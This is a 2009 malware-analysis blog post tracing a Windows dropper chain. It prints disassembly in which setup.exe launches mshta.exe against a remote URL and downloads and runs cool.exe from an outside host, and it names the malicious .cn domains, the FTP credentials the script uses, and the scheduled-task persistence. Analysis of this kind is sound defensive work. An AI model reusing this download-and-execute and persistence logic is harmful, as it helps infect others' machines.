Malware Research Experts: Digital clutter

In relation to a previous post, visting the malicious domain

hxxp://zusojbktvo.cn/fin.php

leads us into downloading

hxxp://woqyymmptn.cn/setup/setup.exe

This malware in turn runs the Microsoft HTML Application host (mshta.exe) to execute hxxp://enjnzdfmts.cn/33t.php

00400256 >/$ 6A 00          PUSH 0                                   ; /IsShown = 0
00400258  |. 6A 00          PUSH 0                                   ; |DefDir = NULL
0040025A  |. 68 39024000    PUSH setup.00400239                      ; |Parameters = "http://enjnzdfmts.cn/33t.php"
0040025F  |. 68 2F024000    PUSH setup.0040022F                      ; |FileName = "mshta.exe"
00400264  |. 6A 00          PUSH 0                                   ; |Operation = NULL
00400266  |. 6A 00          PUSH 0                                   ; |hWnd = NULL
00400268  |. E8 81010000    CALL         ; \ShellExecuteA

The url hxxp://enjnzdfmts.cn/33t.php gives us a page with an obfuscated javascript:

33t

Which translates to:

33t.deobfuscated

The script basically creates and executes files in an attempt to download and install more malware on the affected machine. In the process, it creates a ftp connection to woqyymmptn.cn with the following cretentials:


    username: qqq
    password: 123456

It also creates a batch file that creates numerous Scheduled Tasks that run mshta.exe to execute hxxp://woqyymmptn.cn/33t.php which basically does the same thing as the above script.

jobs

hxxp://12-2005-search.com/cool.exe is then downloaded and executed as %Temp%\675.exe. The download link, however, is no longer active.


004002CD   . 68 90000000    PUSH 90
004002D2   . 891C24         MOV DWORD PTR SS:[ESP],EBX
004002D5   . 68 90000000    PUSH 90
004002DA   . C70424 0401000>MOV DWORD PTR SS:[ESP],104
004002E1   . 68 D0034000    PUSH 
004002E6   . 58             POP EAX
004002E7   . E8 00000000    CALL setup.004002EC
004002EC   $ 830424 06      ADD DWORD PTR SS:[ESP],6
004002F0   . FFE0           JMP EAX                                  ;  
004002F2     E8             DB E8
004002F3     01             DB 01
004002F4     00             DB 00
004002F5     00             DB 00
004002F6   . 0008           ADD BYTE PTR DS:[EAX],CL
004002F8   . 5D             POP EBP
004002F9   . 33C9           XOR ECX,ECX
004002FB   . 8A4D 00        MOV CL,BYTE PTR SS:[EBP]
004002FE   . 8BFB           MOV EDI,EBX
00400300   . 03F8           ADD EDI,EAX
00400302   . BE 08024000    MOV ESI,setup.00400208                   ;  ASCII "675.exe"
00400307   . F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
00400309   . 51             PUSH ECX
0040030A   . 51             PUSH ECX
0040030B   . 53             PUSH EBX
0040030C   . E8 23000000    CALL setup.00400334
00400311   . 68 74 74 70 3A>ASCII "http://"
00400318   . 31 32 2D 32 30>ASCII "12-2005-search.c"
00400328   . 6F 6D 2F 63 6F>ASCII "om/cool.exe",0
00400334   $ 51             PUSH ECX
00400335   . 68 E2034000    PUSH 
0040033A   . 58             POP EAX
0040033B   . E8 00000000    CALL setup.00400340
00400340   $ 830424 06      ADD DWORD PTR SS:[ESP],6
00400344   . FFE0           JMP EAX
00400346   . 51             PUSH ECX
00400347   . 53             PUSH EBX
00400348   . 68 DC034000    PUSH 
0040034D   . 58             POP EAX
0040034E   . E8 00000000    CALL setup.00400353
00400353   $ 830424 06      ADD DWORD PTR SS:[ESP],6
00400357   . FFE0           JMP EAX

The malware uses random filenames as we can see from the filenames used in the embedded script above. These are possibly ramdonly-generated by the PHP code behind it.

In effect, the malware creates heaps of batch files, text files, blank .exe files (unavailable download), and .job files on the affected system. Talk about heavy digital clutter!

Malware Research Experts

Wednesday, July 29, 2009

Digital clutter

No comments:

Post a Comment